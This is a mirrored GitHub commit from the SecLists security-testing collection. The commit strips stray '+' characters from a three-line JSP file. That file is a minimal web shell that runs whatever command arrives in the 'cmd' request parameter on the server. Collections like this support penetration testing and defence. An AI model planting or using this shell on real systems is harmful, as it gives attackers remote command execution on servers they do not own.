mirror of
https://github.com/danielmiessler/SecLists
synced 2025-12-27 19:23:31 +01:00
fix file
remove what seems to be a git addition (`+`)
This commit is contained in:
parent
9196a19470
commit
2affd894a4
1 changed files with 3 additions and 3 deletions
|
|
@ -1,3 +1,3 @@
|
|||
+<%
|
||||
+Runtime.getruntime().exec(request.getParameter("cmd"))
|
||||
+%>
|
||||
<%
|
||||
Runtime.getruntime().exec(request.getParameter("cmd"))
|
||||
%>
|
||||
|
|
|
|||
Loading…
Reference in a new issue